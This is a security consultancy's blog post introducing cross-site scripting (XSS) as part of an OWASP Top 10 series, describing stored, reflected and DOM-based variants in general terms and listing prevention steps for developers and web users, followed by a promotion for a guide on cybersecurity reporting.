Welcome to our OWASP Top 10 series. This series aims at equipping you with foundational security concerns that exist in today’s cybersecurity landscape. The best resource to use for this is the OWASP Top 10. If you haven’t seen it, take some time to visit the page. It should be one of the primary tools in your tool-belt.
 
 
Today we’re looking at Cross Site Scripting, or XSS for short. It’s a code injection attack and very common. It’s been on the OWASP top ten since it started. It’s not called ‘CSS’ because that’s already a web development application, so an ‘X’ is used to indicated ‘cross’.
 
 
The idea behind an XSS attack is that a vulnerable web application can be leveraged to send a malicious script to the client browser and effectively take data off the client so that the data can be used to perform malicious actions like authenticating to a website.
 
 
A vulnerable web application that allows code to be injected into the application can then impact users visiting the web application. When a user visits the site, a JavaScript is executed by the user’s browser. The user’s browser accepts the script because it thinks it’s coming from the trusted web application.
 
 
The attack isn’t focused on attacking the website, it’s focused on leveraging a website to attack a user.
 
 
The malicious script can hijack session cookies and tokens, or distribute malware.
 
 
The main two types of XSS are ‘Stored’ (or persistent) and ‘Reflected’. Stored, also known as ‘persistent’, is a larger threat because it injects the code into the web application where it is stored, thus getting its name. Reflected XSS is not stored in the application, but instead takes advantage of a way to ‘bounce’ the script off the web application onto the client’s browser. This method requires the user to click a link on the page.
 
 
Example:
 
 
A common way this is performed is that an attacker will post what looks like a comment in a blog, or comment section of a website that is actually a malicious javascript. The visiting user finds the post appealing and decides to click on the link and in doing so actually runs the malicious JavaScript. The script runs on the user’s machine and steals the user’s session cookies and provides them back to the attacker. The attacker can then leverage the session cookies to log in to the web application as a user.
 
 
There is a third type of cross-site scripting attack known as DOM-based and leverages the Document Object Model which allows API access to the application code. This attack relies on the client not sanitizing data input.
 
 
How to prevent it. 
 
 
When developing web applications:
 
  • Input Validation: Make sure that any user input field is performing input validation. Input validation on input fields can prevent JavaScript’s from being entered and posted. White-list inputs, only accepting approved characters and values.
  • Escape: You can also escape user-submitted output. This can be done on the HTML, the URL, JavaScript, and other entry code.
  • Sanitize: Lastly you can perform Sanitizing to clean input fields.

When browsing web applications:

  • Trust: Only follow links on trusted websites.
  • Interrogate: Interrogate hyperlinks to validate they are not malicious. This means not following ‘tiny’ URL’s you’re not sure about, hovering over links to see the destination before clicking or viewing the HTML source code to see what the link is.

I hope this provided a good overview of the cross-site scripting (XSS) attack and equipped you with ways to reduce this risk. If you’re a business that is considering the risk of this in your environment start by looking at your hosted applications. Do you host external, web facing, applications? If so, do you any of those applications allow input from guest users? If so, take the time to sit down with the developer and ask the open-ended question of “what is being done to prevent XSS on this web application?” If they don’t mention things like ‘input validation’, ‘ white-listing’, or ‘sanitization’ I recommend reaching out to us at Asher Security or calling another qualified cybersecurity consultant to review the application for you.

To help reduce the risk of your user credentials being used maliciously, I recommend adding a simple one-page overview on XSS in your security awareness training. Highlight and focus on how to prevent it while browsing the web and following hyperlinks.

 

Please post any questions or comments below and we will try to respond.

 

7 Ways to Improve Your Cybersecurity Reporting to Executives and the Board of Directors

A guide for cybersecurity leaders that will help you gain the reputation of a solid leader, while preventing you from making the mistakes I made when I was projected into reporting. This guilde will equip you and remove the stress and anxiety so that you can be clear and bold in your opportunity to prove you're the right person for the role, and your plan is on track!

You have Successfully Subscribed!